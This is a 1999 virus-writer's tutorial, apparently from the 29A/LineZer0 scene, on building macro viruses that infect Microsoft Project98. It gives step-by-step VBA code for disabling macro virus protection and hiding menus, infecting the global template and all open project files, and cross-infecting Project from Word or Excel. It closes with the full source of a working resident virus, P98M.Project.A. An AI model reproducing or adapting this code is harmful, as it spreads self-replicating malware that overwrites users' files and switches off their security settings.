? ? ? ? ____ / \ ? ? / \ _ \ ? -MS Project Infectors ( .o o. ) ___ by jackie /LineZer0 /Metaphase- __/ ^ \/ \ / \___o____ \ Introduction =-=-=-=-=-=- On Oct 26,1999 Data Fellows first reported the birth of a new in- fection platform. Someone wrote a piece of code that was able to infect the MS Project application. Corner, it's name, is a cross application macro between Word97/2K and Project98. The only in- formation about this virus is taken from Data Fellows virus in- formation page. I wanted to give you the source here, but it seems that only the AV community has the source. If someone has it, please mail it to me! Accourding to Data Fellow virus description, Corner (original name in virus code is 'Closer') infects Word in the common way, and is not resident in the template of Project98. It adds a blank project file and infects it. I think that all cross infection is done with ActiveX communication between the two applications. MS Project =-=-=-=-=- What is MS Project? MS Project is accourding the manual an easy to handle and powerful project tool. I only have an evaluation version especially for this tutorial. Like any other Office application, MS Project does have the build in macro language VBA. So if you are a macro coder, you will find your way very very soon. MS Project does also have a global template like in Word, but it is not so easy to access this template, but after a few hours starring at the screen, I found a way to infect it. ;) So first let us take a look on the infection hooks that are avail- able or with any sense for us: -Project_Activate Whenever our infected project book gets activated, due change of windows, or opening, whatever. -Project_Deactivate This hook gets active when our infected project book is the active one and a new one gets opened, or selected, whatever. -Project_Close Like the name says, when our project book gets closed, this hook does it's work. -Project_Open The same as close but only on opening a project book. In my opinion Project_Close and Project_Open are the main hooks for writing a project macro, but use as you like. So now let us look at a common infection sceme: 1.Change some options like virus protection etc. 2.Check if we are in global template 3.If not, infect it 4.Check if we are in all opened project books 5.If not, infect them all Changing some options =-=-=-=-=-=-=-=-=-=-= Due MS Project is part of Office package, the common commands of setting options is nearly the same. Use the following commands: Application.EnableCancelKey = pjDisabled Disables the ESC key while executing a macro. Application.DisplayAlerts = False To stop the displaying of errors. Application.MacroVirusProtection = False To disable the macro virus protection. ;) Application.DisplayStatusBar = False To hide the status bar at the bottom of the window, that our user doesn't see when the book is saved or whatever. CommandBars("Tools").Controls(9).Enabled = False CommandBars("Tools").Controls(12).Enabled = False Use this to have a bit of basic stealth for your Project macro bug. It disables Tools/Macro and Tools/Options. Checking and Infecting template =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= As I got this application and heard that the first macro of this kind is not resisdent in the template, my main goal was to make it resisdent. ;) So I took a seat, looked at the whole help file and found more sand in my pocket than help on how to access this global template in this help file. After starring hours and hours into the screen I got an idea and it worked! Due the cause that you can't access this global template as easy as in Word, you have to use some tricks. So first I took a look at the project window of the Visual Basic Editor, looked and looked, then some idea popped up in my mind: 'What if i access the project?' This idea worked out as you can see below... With Application.VBE.VBProjects(1).VBComponents(1).CodeModule The first project is always the global template project, so we acc- ess this to get access to the class object, 'ThisProject' of the global template. You can also use 'ProjectGlobal' instead of the '1' in VBProjects for the case that someone renames the VBA Pro- ject, which seems where unlikely. So it's a good decision to use the '1'. If .Lines(1, 1) <> "'Project" Then Check if the first line isn't equal to our marker .DeleteLines 1, .CountOfLines Delete all lines if the marker isn't right .InsertLines 1, OurCode Insert our viral code then End If End With This works good. So here you have the code to make a resident macro bug for MS Project but remember, I did it first...hehe. Checking and infecting projects =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= It is a good idea infecting all open project books at once. So there are a few things you should look out for but I will explain them. It is a problem to save the infected book after infection, cause you can only save the active project file. So you need to activate it before saving, otherwise all books will be saved under the same names. To infect all open projects just do a simple 'for/next' loop: For x = 1 To Projects.Count Create a loop from one to the number of all opened project files With Projects(x).VBProject.VBComponents(1).CodeModule If .Lines(1, 1) <> "'Project" Then If the first line in the class object 'ThisProject' isn't equal to our marker, then .DeleteLines 1, .CountOfLines delete all lines in the class .InsertLines 1, OurCode and insert our viral code there. Projects(x).Activate Activate the current infected project file to prepare everything for saving it. FileSaveAs Projects(x).FullName Save the file under it's fullname. End If End With Next Jump next file. We need to activate the project file, that it is saved under the right name. Otherwise all files will be saved under the name of the activated project. Cross application infection =-=-=-=-=-=-=-=-=-=-=-=-=-= Well, cross infection. First I had no clue what the ActiveX class name of MS Project would be, but after a short while I found it in the windows registry. So if you want to use a MS Project as a cross infection part, then you have to change the name of the sub routine from 'Private Sub Project_Open(ByVal pj As MSProject.Project)' to 'Private Sub Project_Open()' or whatever you like, in the other part of the cross infection for example in Word or Excel the original sub name 'Private Sub Project_Open(ByVal pj As MSProject.Project)' will force an error, because ByVal is not definied but you have to change it back if you infect MS Project from Word or Excel so that our infection hook works correct. If you don't understand it here, you will see what I mean if you write your own cross infector. So I wrote this little piece of code here to infect MS Project from another MS Office application: If Application.UserName <> "Empty" Then I use this to prevent re-infection of MS Project everytime our routine runs. Set CrossObj = GetObject(, "msproject.application") Check if MS Project is open. As you see use 'MSProject.Application' as the class for ActiveX communication. If CrossObj = "" Then _ Set CrossObj = CreateObject("msproject.application"): _ QuitUs = 1 If MS Project is not open, create a hidden communication and set our marker if we have to quit the hidden started application. With CrossObj.Application.VBE.VBProjects(1).VBComponents(1).CodeModule The first project is always the global template project, so we acc- ess this to get access to the class object, 'ThisProject' of the global template. .DeleteLines 1, .CountOfLines Delete all lines from the class object .InsertLines 1, OurCode Insert our virulant code Application.UserName = "Empty" Set the user name to 'Empty' to prevent re-infection End With If QuitUs = 1 Then CrossObj.Quit If we started a new application we have to quit it again. End If Well, this whole routine is taken from Empty which is an three app- lication cross infector written by me. Check latest zines for the code. Conclusion =-=-=-=-=- So three days after the birth of the first MS Project infector ever, I am proud to present you the first resisdent MS Project only in- fector. I am sure when I say that this may not be perfect, but I just did it for my own couriosity (and to be the first..hehe). So if someone has the original source of 'Corner' so please send it to me! Also I would like to say thanks to Darkman who brought me to the idea to write such a MS Project infector. This one is for you! Also a big thanks to my man Zer0 how made all this possible, he gave me the url to download my MS Project trial version! Thanks Have phun, jackie [1999] Greets and Thanks =-=-=-=-=-=-=-=-= LineZer0 Network - Kewl people, kewl group! Lz0NT#2 will roq! Metaphase - What about Meta#2? 29A - I am proud to help ya guys! Slagehammer - Thanks for your support all the time! Darkman - Here you are! Thanks for everything HeXcrasher - Phunny to see how everything's developed? Zer0 - Thanks for the url, without you this won't be! Flashkid - DiABLO roqs! Do you have some mana drink for me? Flitnic - You roq! Gigabyte - Got enough horror this helloween? Spo0ky - Hope we can meet IRL someday Fletcher - You can't believe it ha? Sokrates - Fuck shit up! What goes around comes around! Evul - Thanks for all your help all the time! h31x0r - I am drowning in my own self-pity ;( Anti State Tortoise - Heya man, mail me back! May we can merge? All on #virus, #vx - Great channels, great people All I forgot - I love you all, you are beautiful -!NEVER FORGET TO APPRECIATE THE WORK OF OTHER PEOPLE!- As a bonus, here the original source code of the second macro which infects MS Project98, the first one which is resisdent in the global template of MS Project98 and only infects Project files. ( *.MPP ) I could have added a polymorphic routine to change the variables, but I only had two variables, so I thougt that it is not necessary this time...look out Project98/Word97-2K/Excel97-2K.Empty for such a thingie...;) P98M.Project.A Especially for 29A #4 !Do not spread! =-=[code starts here]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 'Project Private Sub Project_Open(ByVal pj As MSProject.Project) On Error Resume Next Application.EnableCancelKey = pjDisabled Application.DisplayAlerts = False Application.MacroVirusProtection = False Application.DisplayStatusBar = False CommandBars("Tools").Controls(9).Enabled = False CommandBars("Tools").Controls(12).Enabled = False OurCode = ThisProject.VBProject.VBComponents(1).CodeModule.Lines(1, 32) Current = ActiveProject.Name With Application.VBE.VBProjects(1).VBComponents(1).CodeModule If .Lines(1, 1) <> "'Project" Then .DeleteLines 1, .CountOfLines .InsertLines 1, OurCode End If End With For x = 1 To Projects.Count With Projects(x).VBProject.VBComponents(1).CodeModule If .Lines(1, 1) <> "'Project" Then .DeleteLines 1, .CountOfLines .InsertLines 1, OurCode Projects(x).Activate FileSaveAs Projects(x).FullName End If End With Next If Projects.Count > 1 Then Projects(Current).Activate If Day(Now) = Int(Rnd * 31) + 1 Then MsgBox ".-=-=-=-=-=-=-=-=-=-=-." _ & vbCr & "| watch people fear! |" & vbCr & "`-=-=-=-=-=-=-=-=-=-=-´", 0, _ "P98M/Project.A" End Sub 'P98M.Project.A by jackie /LineZer0/Metaphase | Darkie, what's up? 'Worlds first resident MS Project infector | Oct 29, 1999 =-=[end of code]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Where ya been, where ya from, where ya going to, where are you going? What goes around, comes around =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- URL to download MS Project: http://www.netpar.com.br/njpj/t_appz.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-